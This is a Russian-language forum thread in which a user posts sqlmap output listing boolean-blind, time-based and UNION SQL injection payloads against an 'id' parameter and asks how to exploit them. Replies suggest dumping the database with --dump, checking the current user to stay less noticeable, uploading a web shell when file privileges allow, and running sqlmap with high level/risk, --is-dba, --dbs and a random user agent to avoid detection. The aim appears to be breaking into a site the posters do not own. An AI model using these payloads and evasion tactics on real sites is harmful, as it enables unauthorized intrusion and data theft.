PDA

Просмотр полной версии : Как использовать иньекции которые предоставил sqlmap?


g00db0y
28.08.2018, 14:28
Добрый день!
При работе с sqlmap, мне выдало следующее:

Код:



Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa

Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: id=-6433' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f465949 72424768546c65456a425a484a504b6e6362454f6b4d504258 51,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#


Подскажите, как это можно эксплуатировать?

sudo
28.08.2018, 14:33
g00db0y сказал(а):

Добрый день!
При работе с sqlmap, мне выдало следующее:

Код:



Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa

Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: id=-6433' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f465949 72424768546c65456a425a484a504b6e6362454f6b4d504258 51,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#


Подскажите, как это можно эксплуатировать?


Например подставить значение поля payload в url?

g00db0y
28.08.2018, 14:36
sudo сказал(а):

Например подставить значение поля payload в url?


вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло

sudo
28.08.2018, 15:02
g00db0y сказал(а):

вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло


Значит прога ошиблась и пейлоады оказались нерабочими. Логично?

g00db0y
28.08.2018, 15:10
sudo сказал(а):

Значит прога ошиблась и пейлоады оказались нерабочими. Логично?


А ведь логично, спасибо!

jess_hide
07.09.2018, 22:01
А зачем тебе в урл добавлять, раскрути sqlmap там же есть специальная функция, почитай help

iskus
08.09.2018, 01:42
сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет

pr0phet
08.09.2018, 12:59
Iskus сказал(а):

сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет


Я обычно добавляю что-то типа --current-user. Менее палево, нежели делать вероятно ненужный дамп. Лучше руками побегать по таблицам посмотреть что есть. Если filepriv позволяет писать файлы - заливаем шелл - дампим базу не селектами. (сценарий из разряда "как в сказке ")

pr0phet
11.10.2018, 02:48
qnit сказал(а):

Parameter: id (GET)

sqlmap.py -u "Bigfoot – Leaving Lasting Footprints in the World of Entertainment" --level 3 --risk 3 --threads 10 --is-dba --dbs --random-agent


Звездочку только не надо в конце.

leonardocs
14.03.2019, 21:32
qnit сказал(а):

тогда --level 3 --risk 3 --threads 10 --is-dba --dbs --random-agent -p id


извините за идиотский вопрос, но из-за 10 потоков шанс улететь в блок увеличивается?